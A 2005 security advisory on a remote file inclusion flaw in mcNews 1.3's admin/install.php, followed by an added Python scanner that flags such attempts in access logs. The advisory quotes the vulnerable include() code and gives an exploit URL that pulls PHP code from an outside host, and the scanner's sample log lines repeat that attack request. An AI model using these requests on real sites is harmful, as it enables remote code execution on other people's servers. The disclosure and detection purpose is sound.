-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BadRoot Security Advisory 2005-#0x01
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thu Mar 17 2005 - 00:46 am GMT +1

Product: mcNews <=1.3 (successfully exploited on 1.3)
Vendor: http://www.phpforums.net/index.php?dir=dld (Home Page)
Type: Arbitrary file inclusion
Author: Jonathan Whiteley (Vukodlak)

Product description:
-----------------------------------
A news management script.

Vulnerable code:
-----------------------------------
--> admin/install.php (lines 33-37)

...
if ($table==1)
{
    // $l comes straight from the request and reaches include() unchecked
    include($l);
    echo ''.$lGoAdmin.'';
}
...

Impact:
-----------------------------------
The $l parameter is passed to include() without any validation, so anyone can have the script fetch and execute PHP code of their choosing by calling:
http://vuln-host.com/path/to/mcnews/admin/install.php?l=http://some.php/source

Solution:
-----------------------------------
Remove install.php; it serves no purpose after the first installation.

Contact:
-----------------------------------
IRC: irc.us.azzurra.org - #badroot - Vukodlak
E-Mail: jon.whiteley@gmail.com
HP: http://www.badroot.org

Cheers

PS: Thanks to Arak for aid ;)
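Added here as a defender-side example, not part of the advisory or of mcNews: a small Python scanner that flags access-log requests to admin/install.php whose l parameter carries a URL, i.e. the remote-inclusion pattern described above. The log lines, hosts and IP addresses are constructed.

```python
"""Flag access-log entries that look like remote file inclusion attempts against
mcNews admin/install.php via its `l` parameter (added example, constructed data)."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/nginx "combined" format; we only need client IP, timestamp, URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# A value beginning with a URL scheme (or scheme-relative //host) means include()
# would fetch the file from a remote host instead of the local language directory.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]*:)?//', re.IGNORECASE)


def is_rfi_attempt(url: str) -> bool:
    """True if the request targets admin/install.php with a remote `l` value."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith('/admin/install.php'):
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get('l', []):
        # parse_qs already decoded once; decode again so double-encoded values
        # (http%253A%252F%252F...) are also recognised.
        if REMOTE_RE.match(unquote(value).strip()):
            return True
    return False


def scan(lines):
    """Return (ip, timestamp, url, status) for each suspicious log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m.group('url')):
            hits.append((m.group('ip'), m.group('ts'), m.group('url'), int(m.group('status'))))
    return hits


SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '198.51.100.7 - - [17/Mar/2005:00:46:01 +0100] "GET /mcnews/admin/install.php?l=http://203.0.113.9/x.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [17/Mar/2005:00:46:05 +0100] "GET /mcnews/admin/install.php?l=http%3A%2F%2F203.0.113.9%2Fx.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.44 - - [17/Mar/2005:00:47:12 +0100] "GET /mcnews/admin/install.php?l=lang_en.php HTTP/1.1" 200 128 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [17/Mar/2005:00:48:00 +0100] "GET /mcnews/index.php?l=http://203.0.113.9/x.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print('possible RFI attempt:', hit)
```

A 200 status on a flagged line means the include was served rather than blocked, which is the case worth investigating first.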